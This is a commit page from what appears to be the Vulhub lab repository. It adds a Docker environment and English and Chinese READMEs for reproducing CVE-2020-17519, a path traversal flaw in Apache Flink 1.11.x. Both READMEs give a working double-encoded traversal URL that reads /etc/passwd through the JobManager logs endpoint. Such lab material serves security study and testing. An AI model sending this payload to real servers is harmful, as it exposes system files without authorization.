first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
flink/CVE-2020-17519/1.png
Normal file
BIN
flink/CVE-2020-17519/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 48 KiB |
32
flink/CVE-2020-17519/README.md
Normal file
32
flink/CVE-2020-17519/README.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# Apache Flink `jobmanager/logs` Path Traversal (CVE-2020-17519)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.
|
||||
|
||||
A vulnerability introduced in Apache Flink 1.11.0 (and present in versions 1.11.1 and 1.11.2) allows attackers to read arbitrary files from the local filesystem through the JobManager's REST interface. This path traversal vulnerability exists in the log viewing functionality.
|
||||
|
||||
References:
|
||||
|
||||
- <https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801>
|
||||
- <https://nvd.nist.gov/vuln/detail/CVE-2020-17519>
|
||||
|
||||
## Environment Setup
|
||||
|
||||
Execute the following command to start an Apache Flink jobmanager 1.11.2:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the Apache Flink service is started, visit `http://your-ip:8081` to access the management interface.
|
||||
|
||||
## Vulnerability Reproduction
|
||||
|
||||
Access the following URL to read the contents of `/etc/passwd` file from the target server:
|
||||
|
||||
```
|
||||
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
|
||||
```
|
||||
|
||||
|
||||
30
flink/CVE-2020-17519/README.zh-cn.md
Normal file
30
flink/CVE-2020-17519/README.zh-cn.md
Normal file
@@ -0,0 +1,30 @@
|
||||
# Apache Flink `jobmanager/logs` 路径穿越漏洞(CVE-2020-17519)
|
||||
|
||||
Apache Flink 是一个开源的分布式流处理和批处理大数据计算引擎。
|
||||
|
||||
Apache Flink 1.11.0 版本中引入的一个更改(同时也存在于 1.11.1 和 1.11.2 版本中)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任意文件。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801>
|
||||
- <https://nvd.nist.gov/vuln/detail/CVE-2020-17519>
|
||||
|
||||
## 环境搭建
|
||||
|
||||
执行如下命令启动一个 Apache Flink jobmanager 1.11.2:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问 `http://your-ip:8081` 即可查看到 Apache Flink 的管理页面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
通过以下 URL 可以读取服务器上的 `/etc/passwd` 文件内容:
|
||||
|
||||
```
|
||||
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
|
||||
```
|
||||
|
||||
|
||||
7
flink/CVE-2020-17519/docker-compose.yml
Normal file
7
flink/CVE-2020-17519/docker-compose.yml
Normal file
@@ -0,0 +1,7 @@
|
||||
services:
|
||||
flink:
|
||||
image: vulhub/flink:1.11.2
|
||||
command: jobmanager
|
||||
ports:
|
||||
- "8081:8081"
|
||||
- "6123:6123"
|
||||
Reference in New Issue
Block a user